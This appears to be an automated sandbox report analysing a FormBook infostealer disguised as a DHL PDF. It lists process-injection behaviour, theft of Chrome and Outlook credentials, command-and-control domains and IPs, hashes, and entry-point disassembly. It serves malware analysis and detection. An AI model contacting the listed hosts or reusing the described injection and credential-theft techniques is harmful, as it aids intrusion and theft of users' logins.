          Source: explorer.exe, 00000004.00000002.514810946.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.263500910.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.256320918.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.256600006.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.509821634.0000000000B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_00401A05 cpuid
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe | Code function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe | Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmmon32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmmon32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK Matrix (the number in parentheses after a technique is the count shown next to it in the report; techniques without a number are the matrix's unmarked placeholder cells)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules (1) | Path Interception | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
          Default Accounts | Command and Scripting Interpreter (2) | Boot or Logon Initialization Scripts | Process Injection (512) | Obfuscated Files or Information (3) | LSASS Memory | File and Directory Discovery (2) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing (11) | Security Account Manager | System Information Discovery (15) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Application Layer Protocol (4) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading (1) | NTDS | Security Software Discovery (141) | Distributed Component Object Model | Clipboard Data (1) | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (2) | LSA Secrets | Virtualization/Sandbox Evasion (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (512) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Behavior Graph (ID: 830435, Sample: DHL_Notification_pdf.exe, Startdate: 20/03/2023, Architecture: WINDOWS, Score: 100)

          Start
            signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 5 other signatures
            -> DHL_Notification_pdf.exe 19 (started)
                 file: C:\Users\user\AppData\Local\Temp\ldndbi.exe, PE32 (dropped)
                 -> ldndbi.exe 1 (started)
                      signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process
                      -> ldndbi.exe (started)
                           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                           -> explorer.exe 2 6 (injected)
                                dnsIp: bohndigitaltech.com 162.241.24.110, 49709, 49710, 80 UNIFIEDLAYER-AS-1US United States; kunimi.org 219.94.129.181, 49705, 49706, 80 SAKURA-CSAKURAInternetIncJP Japan; 11 other IPs or domains
                                signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                                -> cmmon32.exe 13 (started)
                                     dnsIp: www.yongleproducts.com
                                     signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                      -> conhost.exe (started)
          Source | Detection | Scanner | Label
          DHL_Notification_pdf.exe | 54% | ReversingLabs | Win32.Trojan.FormBook
          DHL_Notification_pdf.exe | 46% | Virustotal |
          DHL_Notification_pdf.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\ldndbi.exe | 19% | ReversingLabs | Win32.Trojan.Lazy

          Source | Detection | Scanner | Label
          3.2.ldndbi.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.ldndbi.exe.5d0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          kunimi.org | 4% | Virustotal |
          bohndigitaltech.com | 5% | Virustotal |
          rifleroofers.com | 0% | Virustotal |
                                    http://www.creative-shield.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kotelak.ruexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.0dhy.xyzexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bohndigitaltech.com/hpb7/Xz.explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.amirah.cfdReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kotelak.ru/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.creative-shield.com/hpb7/:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.admet01.clubexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.adoptiveimmunotech.com/hpb7/jexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.bisarropainting.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                      high
                                      http://www.madliainsalu.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.kotelak.ruReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.rifleroofers.comexplorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.denko-kosan.comexplorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.madliainsalu.com/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.mindsetlighting.xyzReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.rifleroofers.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.buymyenergy.com/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=146E771M.5.drfalse
                                        high
                                        http://www.denko-kosan.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                          high
                                          http://www.adoptiveimmunotech.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://nsis.sf.net/NSIS_ErrorErrorDHL_Notification_pdf.exefalse
                                            high
                                            http://www.creative-shield.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                              high
                                              http://www.adoptiveimmunotech.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.creative-shield.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=146E771M.5.drfalse
                                                high
                                                https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                  high
                                                  http://www.traindic.topexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.admet01.club/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.yongleproducts.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1explorer.exe, 00000004.00000002.523730403.00000000157A4000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.0000000005E94000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.bisarropainting.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.bohndigitaltech.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=146E771M.5.drfalse
                                                    high
                                                    http://www.bisarropainting.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yongleproducts.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mindsetlighting.xyzexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 198.46.160.97 | www.0dhy.xyz | United States | 36352 | AS-COLOCROSSINGUS | true |
| 67.222.24.48 | rifleroofers.com | United States | 63410 | PRIVATESYSTEMSUS | true |
| 49.212.180.95 | denko-kosan.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true |
| 1.13.186.125 | www.yongleproducts.com | China | 13335 | CLOUDFLARENETUS | true |
| 162.241.24.110 | bohndigitaltech.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true |
| 219.94.129.181 | kunimi.org | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true |
| 162.0.231.77 | www.traindic.top | Canada | 22612 | NAMECHEAP-NETUS | true |
                                                    Joe Sandbox Version:37.0.0 Beryl
                                                    Analysis ID:830435
                                                    Start date and time:2023-03-20 11:27:15 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 22s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:16
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:DHL_Notification_pdf.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@8/5@12/7
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 71.7% (good quality ratio 66.2%)
                                                    • Quality average: 75.2%
                                                    • Quality standard deviation: 30.7%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
| --- | --- | --- |
| 11:28:23 | API Interceptor | 619x Sleep call for process: explorer.exe modified |
                                                    No context
                                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                    Category:modified
                                                    Size (bytes):94208
                                                    Entropy (8bit):1.2889923589460437
                                                    Encrypted:false
                                                    SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                    MD5:7901DD9DF50A993306401B7360977746
                                                    SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                    SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                    SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):95744
                                                    Entropy (8bit):6.22620721848125
                                                    Encrypted:false
                                                    SSDEEP:1536:X0ZlV4KXc4OxQEsGZDmS+jtBaK/eRuZocSZUpxwkyBp+NnFsSW81kxgsWJjcdvhk:Ed4KALsGZDN+x/yuZocSTkyBw9y8eASK
                                                    MD5:C99B9B59B44F7789DD46E5230C22A9CD
                                                    SHA1:A4551975A1003A0309AE3EEF35FF0183E388707B
                                                    SHA-256:FC5D8E04A8C7A63B993963ABB0A4BA5DD1203818CCA5A04221A0E0470F2A3D1A
                                                    SHA-512:DE8ED5C68B001D32D71DFAE1D9A30D1128848131F77A2FDD64B5E8C047D0E796B52335033F718BC89F0BFEED15517AE038468D227F4ED4A43E63CB51BD75F79E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 19%
                                                    Reputation:low
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):326174
                                                    Entropy (8bit):7.563897951059429
                                                    Encrypted:false
                                                    SSDEEP:6144:1d/7iDj8MH9T02nVWHI/MPkICJa6D22lOqwNjuGKGsGZExocCm:PgjH9A2UH05ICwjw/wNjuGKGsHG
                                                    MD5:E835C61DF57229CDB9D3E96D0C7E8201
                                                    SHA1:79E878C0BD2109C17F1273D61856822AFE949E60
                                                    SHA-256:5F43497768944110E3B665872721D20A11F40A0691DD6FCA543A782FE47060D3
                                                    SHA-512:42E90C700FDBAD71D280F1755DEF646BA74AB2D0485F5B07DBF4E6F4FB843C378B923D1049F17CE10C0BE52770418813E82BBE028938BBFEC3EA45882344E22E
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):5950
                                                    Entropy (8bit):7.1560009193344385
                                                    Encrypted:false
                                                    SSDEEP:96:Farc6oYhg/DrYuAk2XO5oSw0i3D9pdn4m3dwnHgzU15FE9ORPmCsCmbvrfjXC:FarcRRIhX1SJaDNn4maAzU15gJLrLXC
                                                    MD5:A994E285DD19803FB9EC4341608FA3BD
                                                    SHA1:D5D88C4A0C0DD00CF6120AAC684492BC28203088
                                                    SHA-256:95E31DD67CAED4C3E24EAA150BBF40B380AE7DCB308639D45539675A66D827E4
                                                    SHA-512:3BEAFB9225621703067B76099FCA5A9D012F9CB9078F2FB32B6EB803EA2BCE7E6D75598D5DADA3D721F50CA67FFBA3850BCB21A3AADAB73414052F3A03B8E1C6
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210296
                                                    Entropy (8bit):7.998895711202933
                                                    Encrypted:true
                                                    SSDEEP:6144:kd/7iDj8MH9T02nVWHI/MPkICJa6D22lOq4:mgjH9A2UH05ICwjw/4
                                                    MD5:1A4214B2D0C61B85EAB942BAA8B90A45
                                                    SHA1:48AEB34FBB99C2AC55961F17F84E1C3EE0740EAF
                                                    SHA-256:B12B5EB17E8DC4DBC3A9FB16736BCE60E097346E9236719508118510CC9092E1
                                                    SHA-512:E1BD0FA394F3B555A43D62C294EEA6385AE57A1254994FA34644DABFD6BB4208E16A032DA00C8656FC1AEDC9A57DD3FA72599B03FF098FC39EC085B4C90E445C
                                                    Malicious:false
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.92568389123595
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:DHL_Notification_pdf.exe
                                                    File size:299346
                                                    MD5:06f7894017e8f6737d228adc14480c83
                                                    SHA1:fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
                                                    SHA256:bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
                                                    SHA512:a88448b4853746bb49d2640e5f23796187e6234f744ee006c687e93197f9dee86cf826259b2480879dcf00dad0b98355dd49298ece63f0bc32f1d356b3f3d8d6
                                                    SSDEEP:6144:PYa6brXt83aw4ZaNEQRd0SyjNmzvw/gAn/lfVuMqs6sV3jQl:PYRrXtCJ4Zazd0SyxEvwYA/l9l6s1je
                                                    TLSH:C654128023E4C4EADCE10E316E3ADAAEA5FFDA251064564F37953F8679617D2DD0E302
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                    Icon Hash:b2a88c96b2ca6a72
                                                    Entrypoint:0x403640
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:61259b55b8912888e90f516ca08dc514
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 000003F4h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [ebp-14h], ebx
                                                    mov dword ptr [ebp-04h], 0040A230h
                                                    mov dword ptr [ebp-10h], ebx
                                                    call dword ptr [004080C8h]
                                                    mov esi, dword ptr [004080CCh]
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    push eax
                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                    mov dword ptr [ebp-2Ch], ebx
                                                    mov dword ptr [ebp-28h], ebx
                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007FA6B0ABA0EAh
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                    push eax
                                                    call esi
